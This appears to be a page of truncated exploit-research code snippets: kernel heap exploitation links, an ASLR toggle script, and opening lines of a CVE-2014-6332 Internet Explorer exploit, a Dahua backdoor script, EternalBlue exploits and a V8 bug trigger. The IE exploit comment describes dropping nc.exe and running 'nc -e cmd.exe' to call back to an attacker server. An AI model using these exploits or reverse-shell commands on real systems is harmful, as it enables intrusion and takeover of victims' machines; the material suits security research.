This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://phrack.org/issues/64/6.html | |
https://loccs.sjtu.edu.cn/~romangol/download/papers/gossip_ccs2015.pdf | |
http://resources.infosecinstitute.com/exploiting-linux-kernel-heap-corruptions-slub-allocator/ | |
http://www.slideshare.net/nullthreat/fund-linux-priv-esc-wprotections | |
http://www.slideshare.net/sciosecurity/linux-kernel-exploitation | |
http://events.linuxfoundation.org/sites/events/files/slides/slaballocators.pdf | |
https://github.com/xairy/kaslr-bypass-via-prefetch | |
http://www.jikos.cz/jikos/Kmalloc_Internals.html | |
https://github.com/Fuzion24/AndroidKernelExploitationPlayground | |
http://dcjtech.info/topic/linux-kernel-slab-allocators/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@ECHO OFF | |
SETLOCAL | |
ECHO ASLR Enable / Diable Batch Script - Please run as admin | |
set /p Choice=Want to Enable or Disable ASLR? (e or d):%=% | |
if "%Choice%"=="e" goto :ENABLE | |
if "%Choice%"=="d" goto :DISABLE | |
:ENABLE |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<!-- | |
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
'server_ip' and 'server_port' in javascript below determined the connect back target | |
Tested on | |
- IE11 + Windows 7 64-bit (EPM is off) | |
- IE11 + Windoes 8.1 64-bit (EPM is off) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2.7 | |
# | |
# Dahua backdoor Generation 2 and 3 | |
# Author: bashis <mcw noemail eu> March 2017 | |
# | |
# Credentials: No credentials needed (Anonymous) | |
#Jacked from git history | |
# | |
import string |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from impacket import smb | |
from struct import pack | |
import os | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from impacket import smb | |
from struct import pack | |
import os | |
import sys | |
import socket | |
''' | |
EternalBlue exploit by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
================ | |
PATCHEXTRACT.PS1 | |
================= | |
Microsoft MSU Patch Extraction and Patch OrganizationUtility by Greg Linares (@Laughing_Mantis) | |
This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders. | |
Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64) | |
as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
with (true) { | |
// f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16. | |
// take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening | |
function f(){ | |
var x = 8; | |
var y = 0xffffffff; | |
var ind = x & y; | |
x = 16; | |
y = 0xffffffff; | |
var ind2 = ind + (x&y); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Click "Start" and "Run." | |
Type "regedit" without the quotation marks to open the registry editor. | |
Expand "HKEY_LOCAL_MACHINE" and go to "Software." Click on "Microsoft, "WindowsNT," "Current Version" and "AeDebug." | |
Double-click the registry key "Debugger" on the right-window pane. | |
Change the entry to "drwtsn32 -p %ld -e %ld -g" -- including the quotation marks -- to change the post-mortem debugger back to its default. | |
Click "OK" and close the registry editor. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1:064> !heap -p -a 080b8c30 | |
ReadMemory error for address 00000000 | |
Use `!address 00000000' to check validity of the address. | |
ReadMemory error for address 0e4c6f3a | |
Use `!address 0e4c6f3a' to check validity of the address. | |
ReadMemory error for address 00000000 | |
Use `!address 00000000' to check validity of the address. | |
ReadMemory error for address 09cf6f3a | |
Use `!address 09cf6f3a' to check validity of the address. | |
ReadMemory error for address 06cf6f3a |
NewerOlder